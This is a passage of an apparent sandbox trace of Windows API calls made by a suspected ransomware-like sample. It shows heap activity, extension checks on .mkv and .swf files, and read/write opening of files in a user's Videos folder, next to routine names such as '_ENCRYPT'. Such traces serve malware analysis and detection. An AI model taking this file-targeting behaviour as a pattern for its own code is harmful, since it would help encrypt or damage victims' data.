Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0197.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.461] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0197.462] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.462] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.462] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.462] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.462] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0197.462] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.462] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.462] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0197.462] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.462] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.463] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0197.463] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x39d5, lpOverlapped=0x0) returned 1 [0197.463] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0197.463] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x39d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.463] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0197.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.463] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0197.464] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.464] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.464] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.465] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.465] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.466] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.466] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.466] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.466] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.466] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.466] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.466] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.466] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\93qz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.468] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.468] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.469] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.469] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.469] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.470] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.470] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.470] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.471] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.471] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.471] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.471] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.471] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.471] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.472] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.472] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="93QZ.swf", cAlternateFileName="")) returned 0x90add8 [0197.472] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.473] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.473] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, 